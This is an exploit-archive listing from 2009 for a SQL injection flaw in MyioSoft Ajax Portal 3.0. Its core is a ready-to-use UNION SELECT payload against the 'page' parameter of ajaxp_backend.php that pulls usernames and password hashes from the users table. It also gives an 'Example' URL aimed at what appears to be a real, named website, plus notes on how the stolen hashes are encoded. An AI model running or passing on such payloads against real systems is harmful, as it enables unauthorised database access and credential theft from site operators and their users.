[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability
# Published : 2009-04-01
# Author : cOndemned
# Previous Title : GDL 4.x (node) Remote SQL Injection Vulnerability
# Next Title : TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities
AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection Vulnerability
Bug found && Exploited by cOndemned
Greetz: ZaBeaTy, d2, Beowulf, str0ke, Alfons Luja, 0in and others
Proof of Concept : http://[host]/[ajaxportal-3.0_path]/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+PREFIX_users--
Example : http://calmpc.net/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users--
Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.)
// http://www.youtube.com/watch?v=dX_PLimGeHk&flip=1 :P
# www.Syue.com [2009-04-01]